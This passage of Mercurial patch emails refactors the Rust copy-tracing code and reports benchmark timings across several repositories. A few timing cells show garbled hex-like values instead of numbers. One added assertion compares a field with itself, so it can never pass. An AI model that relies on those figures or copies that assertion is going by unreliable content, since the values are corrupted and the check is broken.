old.mark_delete(current_rev); - }); + match &mut p1_copies { + None => (), + Some(copies) => { + copies.entry(deleted).and_modify(|old| { + old.mark_delete(current_rev); + }); + } + }; + match &mut p2_copies { + None => (), + Some(copies) => { + copies.entry(deleted).and_modify(|old| { + old.mark_delete(current_rev); + }); + } + }; } } } - copies + (p1_copies, p2_copies) } // insert one new copy information in an InternalPathCopies # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608112740 -3600 # Wed Dec 16 10:59:00 2020 +0100 # Node ID 2076df13d00f809e6c4eeaf7636ca3813b708fdf # Parent 600f8d510ab617dfe00586a751ddb2e23ffcd774 copies-rust: refactor the "deletion" case We rearrange the code to single out the case where information need to be overwritten on both side of the merge. This open the way to better dealing with this case. Differential Revision: https://phab.mercurial-scm.org/D9651 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -510,22 +510,35 @@ // propagate this information when merging two // InternalPathCopies object. let deleted = path_map.tokenize(deleted_path); - match &mut p1_copies { - None => (), - Some(copies) => { - copies.entry(deleted).and_modify(|old| { - old.mark_delete(current_rev); - }); - } + + let p1_entry = match &mut p1_copies { + None => None, + Some(copies) => match copies.entry(deleted) { + Entry::Occupied(e) => Some(e), + Entry::Vacant(_) => None, + }, + }; + let p2_entry = match &mut p2_copies { + None => None, + Some(copies) => match copies.entry(deleted) { + Entry::Occupied(e) => Some(e), + Entry::Vacant(_) => None, + }, }; - match &mut p2_copies { - None => (), - Some(copies) => { - copies.entry(deleted).and_modify(|old| { - old.mark_delete(current_rev); - }); + + match (p1_entry, p2_entry) { + (None, None) => (), + (Some(mut e), None) => { + e.get_mut().mark_delete(current_rev) } - }; + (None, Some(mut e)) => { + e.get_mut().mark_delete(current_rev) + } + (Some(mut e1), Some(mut e2)) => { + e1.get_mut().mark_delete(current_rev); + e2.get_mut().mark_delete(current_rev); + } + } } } } # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608113218 -3600 # Wed Dec 16 11:06:58 2020 +0100 # Node ID d6d57bfc1a1b8c64dab69be7a846f12ec7f97efa # Parent 2076df13d00f809e6c4eeaf7636ca3813b708fdf copies-rust: record "overwritten" information from both side on delete With this change, we can ensure every (`dest`, `rev`) points to the same value, making a lots of comparison simpler. Differential Revision: https://phab.mercurial-scm.org/D9652 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -75,6 +75,19 @@ self.path = None; } + /// Mark pre-existing copy information as "dropped" by a file deletion + /// + /// Use this when recording copy information from parent → child edges + fn mark_delete_with_pair(&mut self, rev: Revision, other: &Self) { + self.overwritten.insert(self.rev); + if other.rev != rev { + self.overwritten.insert(other.rev); + } + self.overwritten.extend(other.overwritten.iter().copied()); + self.rev = rev; + self.path = None; + } + fn is_overwritten_by(&self, other: &Self) -> bool { other.overwritten.contains(&self.rev) } @@ -535,8 +548,10 @@ e.get_mut().mark_delete(current_rev) } (Some(mut e1), Some(mut e2)) => { - e1.get_mut().mark_delete(current_rev); - e2.get_mut().mark_delete(current_rev); + let cs1 = e1.get_mut(); + let cs2 = e2.get(); + cs1.mark_delete_with_pair(current_rev, &cs2); + e2.insert(cs1.clone()); } } } # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608113465 -3600 # Wed Dec 16 11:11:05 2020 +0100 # Node ID b0a3ca02d17ad328a78fb4a1725f2437319f0059 # Parent d6d57bfc1a1b8c64dab69be7a846f12ec7f97efa copies-rust: implement PartialEqual manually Now that we know that each (dest, rev) pair has at most a unique CopySource, we can simplify comparison a lot. This "simple" step buy a good share of the previous slowdown back in some case: Repo Case Source-Rev Dest-Rev # of revisions old time new time Difference Factor time per rev --------------------------------------------------------------------------------------------------------------------------------------------------------------- mozilla-try x00000_revs_x00000_added_x000_copies 9b2a99adc05e 8e29777b48e6 : 382065 revs, 43.304637 s, 34.443661 s, -8.860976 s, × 0.7954, 90 µs/rev Full benchmark: Repo Case Source-Rev Dest-Rev # of revisions old time new time Difference Factor time per rev --------------------------------------------------------------------------------------------------------------------------------------------------------------- mercurial x_revs_x_added_0_copies ad6b123de1c7 39cfcef4f463 : 1 revs, 0.000043 s, 0.000043 s, +0.000000 s, × 1.0000, 43 µs/rev mercurial x_revs_x_added_x_copies 2b1c78674230 0c1d10351869 : 6 revs, 0.000114 s, 0.000117 s, +0.000003 s, × 1.0263, 19 µs/rev mercurial x000_revs_x000_added_x_copies 81f8ff2a9bf2 dd3267698d84 : 1032 revs, 0.004937 s, 0.004892 s, -0.000045 s, × 0.9909, 4 µs/rev pypy x_revs_x_added_0_copies aed021ee8ae8 099ed31b181b : 9 revs, 0.000339 s, 0.000196 s, -0.000143 s, × 0.5782, 21 µs/rev pypy x_revs_x000_added_0_copies 4aa4e1f8e19a 359343b9ac0e : 1 revs, 0.000049 s, 0.000050 s, +0.000001 s, × 1.0204, 50 µs/rev pypy x_revs_x_added_x_copies ac52eb7bbbb0 72e022663155 : 7 revs, 0.000202 s, 0.000117 s, -0.000085 s, × 0.5792, 16 µs/rev pypy x_revs_x00_added_x_copies c3b14617fbd7 ace7255d9a26 : 1 revs, 0.000409 s, 0.6f1f4a s, -0.000087 s, × 0.7873, 322 µs/rev pypy x_revs_x000_added_x000_copies df6f7a526b60 a83dc6a2d56f : 6 revs, 0.011984 s, 0.011949 s, -0.000035 s, × 0.9971, 1991 µs/rev pypy x000_revs_xx00_added_0_copies 89a76aede314 2f22446ff07e : 4785 revs, 0.050820 s, 0.050802 s, -0.000018 s, × 0.9996, 10 µs/rev pypy x000_revs_x000_added_x_copies 8a3b5bfd266e 2c68e87c3efe : 6780 revs, 0.087953 s, 0.088090 s, +0.000137 s, × 1.0016, 12 µs/rev pypy x000_revs_x000_added_x000_copies 89a76aede314 7b3dda341c84 : 5441 revs, 0.062902 s, 0.062079 s, -0.000823 s, × 0.9869, 11 µs/rev pypy x0000_revs_x_added_0_copies d1defd0dc478 c9cb1334cc78 : 43645 revs, 0.679234 s, 0.635337 s, -0.043897 s, × 0.9354, 14 µs/rev pypy x0000_revs_xx000_added_0_copies bf2c629d0071 4ffed77c095c : 2 revs, 0.013095 s, 0.013262 s, +0.000167 s, × 1.0128, 6631 µs/rev pypy x0000_revs_xx000_added_x000_copies 08ea3258278e d9fa043f30c0 : 11316 revs, 0.120910 s, 0.120085 s, -0.000825 s, × 0.9932, 10 µs/rev netbeans x_revs_x_added_0_copies fb0955ffcbcd a01e9239f9e7 : 2 revs, 0.000087 s, 0.000085 s, -0.000002 s, × 0.9770, 42 µs/rev netbeans x_revs_x000_added_0_copies 6f360122949f 20eb231cc7d0 : 2 revs, 0.000107 s, 0.000110 s, +0.000003 s, × 1.0280, 55 µs/rev netbeans x_revs_x_added_x_copies 1ada3faf6fb6 5a39d12eecf4 : 3 revs, 0.000186 s, 0.000177 s, -0.000009 s, × 0.9516, 59 µs/rev netbeans x_revs_x00_added_x_copies 35be93ba1e2c 9eec5e90c05f : 9 revs, 0.000754 s, 0.000743 s, -0.000011 s, × 0.9854, 82 µs/rev netbeans x000_revs_xx00_added_0_copies eac3045b4fdd 51d4ae7f1290 : 1421 revs, 0.010443 s, 0.010168 s, -0.000275 s, × 0.9737, 7 µs/rev netbeans x000_revs_x000_added_x_copies e2063d266acd 6081d72689dc : 1533 revs, 0.015697 s, 0.015946 s, +0.000249 s, × 1.0159, 10 µs/rev netbeans x000_revs_x000_added_x000_copies ff453e9fee32 411350406ec2 : 5750 revs, 0.063528 s, 0.062712 s, -0.000816 s, × 0.9872, 10 µs/rev netbeans x0000_revs_xx000_added_x000_copies 588c2d1ced70 1aad62e59ddd : 66949 revs, 0.545515 s, 0.523832 s, -0.021683 s, × 0.9603, 7 µs/rev mozilla-central x_revs_x_added_0_copies 3697f962bb7b 7015fcdd43a2 : 2 revs, 0.000089 s, 0.000090 s, +0.000001 s, × 1.0112, 45 µs/rev mozilla-central x_revs_x000_added_0_copies dd390860c6c9 40d0c5bed75d : 8 revs, 0.000265 s, 0.000264 s, -0.000001 s, × 0.9962, 33 µs/rev mozilla-central x_revs_x_added_x_copies 8d198483ae3b 14207ffc2b2f : 9 revs, 0.000381 s, 0.000187 s, -0.000194 s, × 0.4908, 20 µs/rev mozilla-central x_revs_x00_added_x_copies 98cbc58cc6bc 446a150332c3 : 7 revs, 0.000672 s, 0.000665 s, -0.000007 s, × 0.9896, 95 µs/rev mozilla-central x_revs_x000_added_x000_copies 3c684b4b8f68 0a5e72d1b479 : 3 revs, 0.003497 s, 0.003556 s, +0.000059 s, × 1.0169, 1185 µs/rev mozilla-central x_revs_x0000_added_x0000_copies effb563bb7e5 c07a39dc4e80 : 6 revs, 0.073204 s, 0.071345 s, -0.001859 s, × 0.9746, 11890 µs/rev mozilla-central x000_revs_xx00_added_0_copies 6100d773079a 04a55431795e : 1593 revs, 0.006482 s, 0.006551 s, +0.000069 s, × 1.0106, 4 µs/rev mozilla-central x000_revs_x000_added_x_copies 9f17a6fc04f9 2d37b966abed : 41 revs, 0.005066 s, 0.005078 s, +0.000012 s, × 1.0024, 123 µs/rev mozilla-central x000_revs_x000_added_x000_copies 7c97034feb78 4407bd0c6330 : 7839 revs, 0.065707 s, 0.065823 s, +0.000116 s, × 1.0018, 8 µs/rev mozilla-central x0000_revs_xx000_added_0_copies 9eec5917337d 67118cc6dcad : 615 revs, 0.026800 s, 0.027050 s, +0.000250 s, × 1.0093, 43 µs/rev mozilla-central x0000_revs_xx000_added_x000_copies f78c615a656c 96a38b690156 : 30263 revs, 0.203856 s, 0.202443 s, -0.001413 s, × 0.9931, 6 µs/rev mozilla-central x00000_revs_x0000_added_x0000_copies 6832ae71433c 4c222a1d9a00 : 153721 revs, 1.293394 s, 1.261583 s, -0.031811 s, × 0.9754, 8 µs/rev mozilla-central x00000_revs_x00000_added_x000_copies 76caed42cf7c 1daa622bbe42 : 204976 revs, 1.698239 s, 1.643869 s, -0.054370 s, × 0.9680, 8 µs/rev mozilla-try x_revs_x_added_0_copies aaf6dde0deb8 9790f499805a : 2 revs, 0.000875 s, 0.000868 s, -0.000007 s, × 0.9920, 434 µs/rev mozilla-try x_revs_x000_added_0_copies d8d0222927b4 5bb8ce8c7450 : 2 revs, 0.000891 s, 0.000887 s, -0.000004 s, × 0.9955, 443 µs/rev mozilla-try x_revs_x_added_x_copies 092fcca11bdb 936255a0384a : 4 revs, 0.000292 s, 0.000168 s, -0.000124 s, × 0.5753, 42 µs/rev mozilla-try x_revs_x00_added_x_copies b53d2fadbdb5 017afae788ec : 2 revs, 0.003939 s, 0.001160 s, -0.002779 s, × 0.2945, 580 µs/rev mozilla-try x_revs_x000_added_x000_copies 20408ad61ce5 6f0ee96e21ad : 1 revs, 0.033027 s, 0.033016 s, -0.000011 s, × 0.9997, 33016 µs/rev mozilla-try x_revs_x0000_added_x0000_copies effb563bb7e5 c07a39dc4e80 : 6 revs, 0.073703 s, 0.073312 s, -0.39ae31 s, × 0.9947, 12218 µs/rev mozilla-try x000_revs_xx00_added_0_copies 6100d773079a 04a55431795e : 1593 revs, 0.006469 s, 0.006485 s, +0.000016 s, × 1.0025, 4 µs/rev mozilla-try x000_revs_x000_added_x_copies 9f17a6fc04f9 2d37b966abed : 41 revs, 0.005278 s, 0.005494 s, +0.000216 s, × 1.0409, 134 µs/rev mozilla-try x000_revs_x000_added_x000_copies 1346fd0130e4 4c65cbdabc1f : 6657 revs, 0.064995 s, 0.064879 s, -0.000116 s, × 0.9982, 9 µs/rev mozilla-try x0000_revs_x_added_0_copies 63519bfd42ee a36a2a865d92 : 40314 revs, 0.301041 s, 0.301469 s, +0.000428 s, × 1.0014, 7 µs/rev mozilla-try x0000_revs_x_added_x_copies 9fe69ff0762d bcabf2a78927 : 38690 revs, 0.285575 s, 0.297113 s, +0.011538 s, × 1.0404, 7 µs/rev mozilla-try x0000_revs_xx000_added_x_copies 156f6e2674f2 4d0f2c178e66 : 8598 revs, 0.085597 s, 0.085890 s, +0.000293 s, × 1.0034, 9 µs/rev mozilla-try x0000_revs_xx000_added_0_copies 9eec5917337d 67118cc6dcad : 615 revs, 0.027118 s, 0.027718 s, +0.000600 s, × 1.0221, 45 µs/rev mozilla-try x0000_revs_xx000_added_x000_copies 89294cd501d9 7ccb2fc7ccb5 : 97052 revs, 2.119204 s, 2.048949 s, -0.070255 s, × 0.9668, 21 µs/rev mozilla-try x0000_revs_x0000_added_x0000_copies e928c65095ed e951f4ad123a : 52031 revs, 0.701479 s, 0.685924 s, -0.015555 s, × 0.9778, 13 µs/rev mozilla-try x00000_revs_x_added_0_copies 6a320851d377 1ebb79acd503 : 363753 revs, 4.482399 s, 4.482891 s, +0.000492 s, × 1.0001, 12 µs/rev mozilla-try x00000_revs_x00000_added_0_copies dc8a3ca7010e d16fde900c9c : 34414 revs, 0.574082 s, 0.577633 s, +0.003551 s, × 1.0062, 16 µs/rev mozilla-try x00000_revs_x_added_x_copies 5173c4b6f97c 95d83ee7242d : 362229 revs, 4.480366 s, 4.397816 s, -0.082550 s, × 0.9816, 12 µs/rev mozilla-try x00000_revs_x000_added_x_copies 9126823d0e9c ca82787bb23c : 359344 revs, 4.369070 s, 4.370538 s, +0.001468 s, × 1.0003, 12 µs/rev mozilla-try x00000_revs_x0000_added_x0000_copies 8d3fafa80d4b eb884023b810 : 192665 revs, 1.592506 s, 1.570439 s, -0.022067 s, × 0.9861, 8 µs/rev mozilla-try x00000_revs_x00000_added_x0000_copies 1b661134e2ca 1ae03d022d6d : 228985 revs, 87.824489 s, 88.388512 s, +0.564023 s, × 1.0064, 386 µs/rev mozilla-try x00000_revs_x00000_added_x000_copies 9b2a99adc05e 8e29777b48e6 : 382065 revs, 43.304637 s, 34.443661 s, -8.860976 s, × 0.7954, 90 µs/rev private : 459513 revs, 33.853687 s, 27.370148 s, -6.483539 s, × 0.8085, 59 µs/rev Differential Revision: https://phab.mercurial-scm.org/D9653 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -16,7 +16,7 @@ type PathToken = usize; -#[derive(Clone, Debug, PartialEq)] +#[derive(Clone, Debug)] struct CopySource { /// revision at which the copy information was added rev: Revision, @@ -93,6 +93,21 @@ } } +// For the same "dest", content generated for a given revision will always be +// the same. +impl PartialEq for CopySource { + fn eq(&self, other: &Self) -> bool { + #[cfg(debug_assertions)] + { + if self.rev == other.rev { + debug_assert!(self.path == other.path); + debug_assert!(self.overwritten == other.overwritten); + } + } + self.rev == other.rev + } +} + /// maps CopyDestination to Copy Source (+ a "timestamp" for the operation) type InternalPathCopies = OrdMap<PathToken, CopySource>; # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608545745 -3600 # Mon Dec 21 11:15:45 2020 +0100 # Node ID 8fcf07e6bbb478d768e817e0387c81e582cdb978 # Parent b0a3ca02d17ad328a78fb4a1725f2437319f0059 copies-rust: make more use of the new comparison property We deal with the "both are the same" sooner and simplify the rest of the conditional. Differential Revision: https://phab.mercurial-scm.org/D9654 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -847,49 +847,31 @@ src_minor: &CopySource, src_major: &CopySource, ) -> (MergePick, bool) { - if src_major.rev == current_merge { - if src_minor.rev == current_merge { - if src_major.path.is_none() { - // We cannot get different copy information for both p1 and p2 - // from the same revision. Unless this was a - // deletion. - // - // However the deletion might come over different data on each - // branch. - let need_over = src_major.overwritten != src_minor.overwritten; - (MergePick::Any, need_over) - } else { - unreachable!(); - } - } else { - // The last value comes the current merge, this value -will- win - // eventually. - (MergePick::Major, true) - } + if src_major == src_minor { + (MergePick::Any, false) + } else if src_major.rev == current_merge { + // minor is different according to per minor == major check earlier + debug_assert!(src_minor.rev != current_merge); + + // The last value comes the current merge, this value -will- win + // eventually. + (MergePick::Major, true) } else if src_minor.rev == current_merge { // The last value comes the current merge, this value -will- win // eventually. (MergePick::Minor, true) } else if src_major.path == src_minor.path { + debug_assert!(src_major.rev != src_major.rev); // we have the same value, but from other source; - if src_major.rev == src_minor.rev { - // If the two entry are identical, they are both valid - debug_assert!(src_minor.overwritten == src_minor.overwritten); - (MergePick::Any, false) - } else if src_major.is_overwritten_by(src_minor) { + if src_major.is_overwritten_by(src_minor) { (MergePick::Minor, false) } else if src_minor.is_overwritten_by(src_major) { (MergePick::Major, false) } else { (MergePick::Any, true) } - } else if src_major.rev == src_minor.rev { - // We cannot get copy information for both p1 and p2 in the - // same rev. So this is the same value. - unreachable!( - "conflicting information from p1 and p2 in the same revision" - ); } else { + debug_assert!(src_major.rev != src_major.rev); let dest_path = path_map.untokenize(*dest); let action = changes.get_merge_case(dest_path); if src_minor.path.is_some() # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608546031 -3600 # Mon Dec 21 11:20:31 2020 +0100 # Node ID aa19d60ac9747bcc0624a1c78b887f62c50bd0bd # Parent 8fcf07e6bbb478d768e817e0387c81e582cdb978 copies-rust: use simpler overwrite when value on both side are identical If the value are the same, their "overwritten" set is the same and we don't need to combine them. It helps our slower cases Repo Case Source-Rev Dest-Rev # of revisions old time new time Difference Factor time per rev --------------------------------------------------------------------------------------------------------------------------------------------------------------- mozilla-try x00000_revs_x00000_added_x0000_copies 1b661134e2ca 1ae03d022d6d : 228985 revs, 86.722016 s, 80.828689 s, -5.893327 s, × 0.9320, 352 µs/rev mozilla-try x00000_revs_x00000_added_x000_copies 9b2a99adc05e 8e29777b48e6 : 382065 revs, 35.113727 s, 34.094064 s, -1.019663 s, × 0.9710, 89 µs/rev Full comparison with the previous revision below: Repo Case Source-Rev Dest-Rev # of revisions old time new time Difference Factor time per rev --------------------------------------------------------------------------------------------------------------------------------------------------------------- mercurial x_revs_x_added_0_copies ad6b123de1c7 39cfcef4f463 : 1 revs, 0.000043 s, 0.000043 s, +0.000000 s, × 1.0000, 43 µs/rev mercurial x_revs_x_added_x_copies 2b1c78674230 0c1d10351869 : 6 revs, 0.000114 s, 0.000114 s, +0.000000 s, × 1.0000, 19 µs/rev mercurial x000_revs_x000_added_x_copies 81f8ff2a9bf2 dd3267698d84 : 1032 revs, 0.004899 s, 0.004899 s, +0.000000 s, × 1.0000, 4 µs/rev pypy x_revs_x_added_0_copies aed021ee8ae8 099ed31b181b : 9 revs, 0.000196 s, 0.000196 s, +0.000000 s, × 1.0000, 21 µs/rev pypy x_revs_x000_added_0_copies 4aa4e1f8e19a 359343b9ac0e : 1 revs, 0.000050 s, 0.000049 s, -0.000001 s, × 0.9800, 49 µs/rev pypy x_revs_x_added_x_copies ac52eb7bbbb0 72e022663155 : 7 revs, 0.000125 s, 0.000117 s, -0.000008 s, × 0.9360, 16 µs/rev pypy x_revs_x00_added_x_copies c3b14617fbd7 ace7255d9a26 : 1 revs, 0.000321 s, 0.6f1f4a s, +0.000001 s, × 1.0031, 322 µs/rev pypy x_revs_x000_added_x000_copies df6f7a526b60 a83dc6a2d56f : 6 revs, 0.011948 s, 0.011856 s, -0.000092 s, × 0.9923, 1976 µs/rev pypy x000_revs_xx00_added_0_copies 89a76aede314 2f22446ff07e : 4785 revs, 0.051267 s, 0.050992 s, -0.000275 s, × 0.9946, 10 µs/rev pypy x000_revs_x000_added_x_copies 8a3b5bfd266e 2c68e87c3efe : 6780 revs, 0.087755 s, 0.087444 s, -0.000311 s, × 0.9965, 12 µs/rev pypy x000_revs_x000_added_x000_copies 89a76aede314 7b3dda341c84 : 5441 revs, 0.061818 s, 0.062487 s, +0.000669 s, × 1.0108, 11 µs/rev pypy x0000_revs_x_added_0_copies d1defd0dc478 c9cb1334cc78 : 43645 revs, 0.634253 s, 0.634909 s, +0.000656 s, × 1.0010, 14 µs/rev pypy x0000_revs_xx000_added_0_copies bf2c629d0071 4ffed77c095c : 2 revs, 0.013179 s, 0.013360 s, +0.000181 s, × 1.0137, 6680 µs/rev pypy x0000_revs_xx000_added_x000_copies 08ea3258278e d9fa043f30c0 : 11316 revs, 0.119643 s, 0.120775 s, +0.001132 s, × 1.0095, 10 µs/rev netbeans x_revs_x_added_0_copies fb0955ffcbcd a01e9239f9e7 : 2 revs, 0.000085 s, 0.000085 s, +0.000000 s, × 1.0000, 42 µs/rev netbeans x_revs_x000_added_0_copies 6f360122949f 20eb231cc7d0 : 2 revs, 0.000107 s, 0.000108 s, +0.000001 s, × 1.0093, 54 µs/rev netbeans x_revs_x_added_x_copies 1ada3faf6fb6 5a39d12eecf4 : 3 revs, 0.000176 s, 0.000176 s, +0.000000 s, × 1.0000, 58 µs/rev netbeans x_revs_x00_added_x_copies 35be93ba1e2c 9eec5e90c05f : 9 revs, 0.000743 s, 0.000747 s, +0.000004 s, × 1.0054, 83 µs/rev netbeans x000_revs_xx00_added_0_copies eac3045b4fdd 51d4ae7f1290 : 1421 revs, 0.010246 s, 0.010128 s, -0.000118 s, × 0.9885, 7 µs/rev netbeans x000_revs_x000_added_x_copies e2063d266acd 6081d72689dc : 1533 revs, 0.015853 s, 0.015899 s, +0.000046 s, × 1.0029, 10 µs/rev netbeans x000_revs_x000_added_x000_copies ff453e9fee32 411350406ec2 : 5750 revs, 0.062971 s, 0.062215 s, -0.000756 s, × 0.9880, 10 µs/rev netbeans x0000_revs_xx000_added_x000_copies 588c2d1ced70 1aad62e59ddd : 66949 revs, 0.518337 s, 0.521004 s, +0.002667 s, × 1.0051, 7 µs/rev mozilla-central x_revs_x_added_0_copies 3697f962bb7b 7015fcdd43a2 : 2 revs, 0.000090 s, 0.000090 s, +0.000000 s, × 1.0000, 45 µs/rev mozilla-central x_revs_x000_added_0_copies dd390860c6c9 40d0c5bed75d : 8 revs, 0.000268 s, 0.000264 s, -0.000004 s, × 0.9851, 33 µs/rev mozilla-central x_revs_x_added_x_copies 8d198483ae3b 14207ffc2b2f : 9 revs, 0.000187 s, 0.000186 s, -0.000001 s, × 0.9947, 20 µs/rev mozilla-central x_revs_x00_added_x_copies 98cbc58cc6bc 446a150332c3 : 7 revs, 0.000661 s, 0.000660 s, -0.000001 s, × 0.9985, 94 µs/rev mozilla-central x_revs_x000_added_x000_copies 3c684b4b8f68 0a5e72d1b479 : 3 revs, 0.003494 s, 0.003542 s, +0.000048 s, × 1.0137, 1180 µs/rev mozilla-central x_revs_x0000_added_x0000_copies effb563bb7e5 c07a39dc4e80 : 6 revs, 0.070509 s, 0.071574 s, +0.001065 s, × 1.0151, 11929 µs/rev mozilla-central x000_revs_xx00_added_0_copies 6100d773079a 04a55431795e : 1593 revs, 0.006489 s, 0.006498 s, +0.000009 s, × 1.0014, 4 µs/rev mozilla-central x000_revs_x000_added_x_copies 9f17a6fc04f9 2d37b966abed : 41 revs, 0.005070 s, 0.005206 s, +0.000136 s, × 1.0268, 126 µs/rev mozilla-central x000_revs_x000_added_x000_copies 7c97034feb78 4407bd0c6330 : 7839 revs, 0.065241 s, 0.065535 s, +0.000294 s, × 1.0045, 8 µs/rev mozilla-central x0000_revs_xx000_added_0_copies 9eec5917337d 67118cc6dcad : 615 revs, 0.027284 s, 0.027139 s, -0.000145 s, × 0.9947, 44 µs/rev mozilla-central x0000_revs_xx000_added_x000_copies f78c615a656c 96a38b690156 : 30263 revs, 0.203671 s, 0.201924 s, -0.001747 s, × 0.9914, 6 µs/rev mozilla-central x00000_revs_x0000_added_x0000_copies 6832ae71433c 4c222a1d9a00 : 153721 revs, 1.239373 s, 1.257201 s, +0.017828 s, × 1.0144, 8 µs/rev mozilla-central x00000_revs_x00000_added_x000_copies 76caed42cf7c 1daa622bbe42 : 204976 revs, 1.649803 s, 1.663045 s, +0.013242 s, × 1.0080, 8 µs/rev mozilla-try x_revs_x_added_0_copies aaf6dde0deb8 9790f499805a : 2 revs, 0.000868 s, 0.000866 s, -0.000002 s, × 0.9977, 433 µs/rev mozilla-try x_revs_x000_added_0_copies d8d0222927b4 5bb8ce8c7450 : 2 revs, 0.000885 s, 0.000883 s, -0.000002 s, × 0.9977, 441 µs/rev mozilla-try x_revs_x_added_x_copies 092fcca11bdb 936255a0384a : 4 revs, 0.000165 s, 0.000163 s, -0.000002 s, × 0.9879, 40 µs/rev mozilla-try x_revs_x00_added_x_copies b53d2fadbdb5 017afae788ec : 2 revs, 0.001147 s, 0.001139 s, -0.000008 s, × 0.9930, 569 µs/rev mozilla-try x_revs_x000_added_x000_copies 20408ad61ce5 6f0ee96e21ad : 1 revs, 0.032885 s, 0.032753 s, -0.000132 s, × 0.9960, 32752 µs/rev mozilla-try x_revs_x0000_added_x0000_copies effb563bb7e5 c07a39dc4e80 : 6 revs, 0.071304 s, 0.073266 s, +0.001962 s, × 1.0275, 12211 µs/rev mozilla-try x000_revs_xx00_added_0_copies 6100d773079a 04a55431795e : 1593 revs, 0.006506 s, 0.006567 s, +0.000061 s, × 1.0094, 4 µs/rev mozilla-try x000_revs_x000_added_x_copies 9f17a6fc04f9 2d37b966abed : 41 revs, 0.005486 s, 0.005427 s, -0.000059 s, × 0.9892, 132 µs/rev mozilla-try x000_revs_x000_added_x000_copies 1346fd0130e4 4c65cbdabc1f : 6657 revs, 0.064677 s, 0.064058 s, -0.000619 s, × 0.9904, 9 µs/rev mozilla-try x0000_revs_x_added_0_copies 63519bfd42ee a36a2a865d92 : 40314 revs, 0.306000 s, 0.303320 s, -0.002680 s, × 0.9912, 7 µs/rev mozilla-try x0000_revs_x_added_x_copies 9fe69ff0762d bcabf2a78927 : 38690 revs, 0.288217 s, 0.288456 s, +0.000239 s, × 1.0008, 7 µs/rev mozilla-try x0000_revs_xx000_added_x_copies 156f6e2674f2 4d0f2c178e66 : 8598 revs, 0.086117 s, 0.085925 s, -0.000192 s, × 0.9978, 9 µs/rev mozilla-try x0000_revs_xx000_added_0_copies 9eec5917337d 67118cc6dcad : 615 revs, 0.027512 s, 0.027302 s, -0.000210 s, × 0.9924, 44 µs/rev mozilla-try x0000_revs_xx000_added_x000_copies 89294cd501d9 7ccb2fc7ccb5 : 97052 revs, 1.998239 s, 2.034596 s, +0.036357 s, × 1.0182, 20 µs/rev mozilla-try x0000_revs_x0000_added_x0000_copies e928c65095ed e951f4ad123a : 52031 revs, 0.688201 s, 0.694030 s, +0.005829 s, × 1.0085, 13 µs/rev mozilla-try x00000_revs_x_added_0_copies 6a320851d377 1ebb79acd503 : 363753 revs, 4.389428 s, 4.407723 s, +0.018295 s, × 1.0042, 12 µs/rev mozilla-try x00000_revs_x00000_added_0_copies dc8a3ca7010e d16fde900c9c : 34414 revs, 0.578736 s, 0.574355 s, -0.004381 s, × 0.9924, 16 µs/rev mozilla-try x00000_revs_x_added_x_copies 5173c4b6f97c 95d83ee7242d : 362229 revs, 4.363599 s, 4.457827 s, +0.094228 s, × 1.0216, 12 µs/rev mozilla-try x00000_revs_x000_added_x_copies 9126823d0e9c ca82787bb23c : 359344 revs, 4.324129 s, 4.351696 s, +0.027567 s, × 1.0064, 12 µs/rev mozilla-try x00000_revs_x0000_added_x0000_copies 8d3fafa80d4b eb884023b810 : 192665 revs, 1.565727 s, 1.570065 s, +0.004338 s, × 1.0028, 8 µs/rev mozilla-try x00000_revs_x00000_added_x0000_copies 1b661134e2ca 1ae03d022d6d : 228985 revs, 86.722016 s, 80.828689 s, -5.893327 s, × 0.9320, 352 µs/rev mozilla-try x00000_revs_x00000_added_x000_copies 9b2a99adc05e 8e29777b48e6 : 382065 revs, 35.113727 s, 34.094064 s, -1.019663 s, × 0.9710, 89 µs/rev private : 459513 revs, 27.397070 s, 27.435529 s, +0.038459 s, × 1.0014, 59 µs/rev Differential Revision: https://phab.mercurial-scm.org/D9655 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -565,7 +565,11 @@ (Some(mut e1), Some(mut e2)) => { let cs1 = e1.get_mut(); let cs2 = e2.get(); - cs1.mark_delete_with_pair(current_rev, &cs2); + if cs1 == cs2 { + cs1.mark_delete(current_rev); + } else { + cs1.mark_delete_with_pair(current_rev, &cs2); + } e2.insert(cs1.clone()); } } # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608550499 -3600 # Mon Dec 21 12:34:59 2020 +0100 # Node ID 60b2b7ecf9cbd30d14ee8fd26f15ae3f942566b2 # Parent aa19d60ac9747bcc0624a1c78b887f62c50bd0bd copies-rust: use imrs::OrdSet instead of imrs::HashSet This yield small speedup all over the board, and a large one for our slower cases: Repo Case Source-Rev Dest-Rev # of revisions old time new time Difference Factor time per rev --------------------------------------------------------------------------------------------------------------------------------------------------------------- mozilla-try x0000_revs_xx000_added_x000_copies 89294cd501d9 7ccb2fc7ccb5 : 97052 revs, 2.034596 s, 1.465264 s, -0.569332 s, × 0.7202, 15 µs/rev mozilla-try x0000_revs_x0000_added_x0000_copies e928c65095ed e951f4ad123a : 52031 revs, 0.694030 s, 0.690376 s, -0.003654 s, × 0.9947, 13 µs/rev mozilla-try x00000_revs_x_added_0_copies 6a320851d377 1ebb79acd503 : 363753 revs, 4.407723 s, 4.011322 s, -0.396401 s, × 0.9101, 11 µs/rev mozilla-try x00000_revs_x00000_added_0_copies dc8a3ca7010e d16fde900c9c : 34414 revs, 0.574355 s, 0.573541 s, -0.000814 s, × 0.9986, 16 µs/rev mozilla-try x00000_revs_x_added_x_copies 5173c4b6f97c 